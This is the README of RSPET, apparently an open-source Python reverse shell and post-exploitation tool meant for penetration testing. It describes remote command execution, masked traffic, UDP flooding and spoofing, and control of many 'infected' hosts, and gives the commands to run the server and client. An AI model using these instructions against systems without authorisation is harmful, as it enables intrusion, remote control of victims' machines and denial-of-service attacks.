RSPET

RSPET (Reverse Shell and Post Exploitation Tool) is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario.

DISCLAIMER: This software is provided for educational and PenTesting purposes and as a proof of concept. The developer(s) do not endorse, incite or in any other way support unauthorised computer access and networks disruption.

NOTE: min folder has been removed. The added overhead of maintaining two versions lead to min not recieving bug-fixes and important updates. If there is interest, both in using and maintaining, a more bare-bone and simplistic version, a new branch will be created to host it.

Current Version: v0.2.7

Follow: @TheRSPET on Twitter for updates.

Documentation : rspet.readthedocs.io

Features

• Remote Command Execution
• Trafic masking (XORed instead of cleartext); for better results use port 443[1]
• Built-in File/Binary transfer (both ways) over the masked traffic
• Built-in UDP Flooding tool
• Built-in UDP Spoofing tool[2]
• Multiple/All Hosts management; order File/Binary transfer and UDP Flood from Multiple/All connected Hosts
• Modular Code Design to allow easy customization
• Client script is tested and is compatible with PyInstaller (can be made into .exe)[3]
• Full server side plug-in support.[4]
• RESTful API for the Server Module.

*[1]The idea for XORing as well as the skeleton for the client came from primalsecurity.net so if you like this pack of scripts you'll probably love what they do

*[2]UDP Spoofing uses RAW_SOCKETS so in order to utilize it, the client has to run on an OS that supports RAW_SOCKETS (most Unix-Based) and with root privilages. Finally, most of the ISPs have implementations in place that will either drop or re-structure spoofed packets

*[3]Again check primalsecurity.net's perfect blogpost about producing an .exe

*[4]Detailed documentation on creating plugins available in Online Documentation!

Deployment:

• rspet_server.py is situated at the attacker's machine and running to accept connections
• rspet_client.py is situated in the infected machine(s) and will initiate the connection and wait for input.

Execution:

• Server:

python rspet_server.py (max_connections) 

max_connections defaults to 5 if left blank

• RESTful API:

  • Install Flask with pip (only the first time)

    pip2 install Flask

  • Start the API

    python rspet_server_api.py

• Client:

python rspet_client.py server_ip

Many changes can be made to fit individual needs.

As always if you have any suggestion, bug report or complain feel free to contact me.

ASCIICAST

Distros

A list of Distros that contain RSPET

• BlackArch Linux (as of version 2016.04.28)
• ArchStrike

As Featured in

• seclist.us
• sillycon.org
• digitalmunition.me
• n0where.net
• kitploit.com
• Hakin9 IT Security Magazine

Todo

• Fix logic bug where if a direct command to Host OS has no output Server displays command not recognized
• Fix logic bug where if a direct command's to Host OS execution is perpetual the Server deadlocks
• Add client version and type (min or full) as a property when client connects and at List_Hosts
• Replace XORing with private key encryption (with random private key generated and traded upon connection)
• Must find a way that does not require any extra installation on the client
• Add a NoSQL (at least server-side) to store and handle traded keys
• Add public key encryption in order to:
  • Encrypt the exchange of the private key
  • Verify the "authenticity" of clients
• Add client update mechanism (initial thought was the use of execv but it acts up)
• Add a plugin system to client (a more compact one)
• Add remote installation of plugins to client
• Add installed plugins report from client to server
• Add UDP Reflection functionality
• Provide more settings via config file
• Re-introduce multythreading when handling multiple hosts.
• Make commands available with 'Tab' automatically generated based on loaded plugins.
• Fix logical bug when deleting a client. (Client still shows up on List_Hosts)
• Create comprehensive plug-in creation guide.

Styleguide

This project is following Google's Python Styleguide with a minor variation on the use of whitespaces to align ":" tokens.

Contribution Opportunities

This project is open for contributors. If you have implemented a new feature, or maybe an improvement to the current code feel free to open a pull request. If you want to sugest a new feature open an issue. Additionally Testers are needed to run a few standard scenarios (and a few of their own maybe) to decrease the chance a bug slips into a new version. Should there be any interest about testing a beta branch will be created (where code to be tested will be uploaded) along with a list of scenarios. For a full guide on contribution opportunities and guides check out the "Contributing" chapter on RSPET's Online Documentation

Author - Project Owner/Manager

panagiks

Co-Author

dzervas -- Code (Server OO-redesign, Server Plug-in system implementation, bug reports, bug fixes)

Contributors

• b3mb4m -- Code (tab.py and bug fixes)
• junzy -- Docstings (udp_spoof & udp_spoof_send)

License

MIT